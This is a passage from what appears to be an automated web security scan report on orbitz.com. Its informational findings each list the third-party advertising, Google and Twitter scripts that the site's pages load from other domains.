http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.796. http://www.orbitz.com/App/DPTLandingPageSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DPTLandingPageSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663114771&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.797. http://www.orbitz.com/App/DisplayCarSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DisplayCarSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=120&rotator=module&width=519&adType=script&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext5&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext6&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext7&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext8&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.798. http://www.orbitz.com/App/DisplayCarSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DisplayCarSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=120&rotator=module&width=519&adType=script&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext5&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext6&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext7&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext8&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.799. http://www.orbitz.com/App/GDDC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=300x200_dow&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&adType=script&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=dealscartext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_bottom&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=300x600_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=600&width=300&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662825126&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.800. http://www.orbitz.com/App/GDDC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://www.google.com/jsapi
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662818389&dsrc=7&

Request

Response

18.801. http://www.orbitz.com/App/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Home

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715474005&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.802. http://www.orbitz.com/App/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Home

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.803. http://www.orbitz.com/App/InitDealEdit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/InitDealEdit

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&
http://www.revresda.com/js.ng/channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&

Request

Response

18.804. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&

Request

Response

18.805. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799484&dsrc=7&height=1&width=1channel=deals&
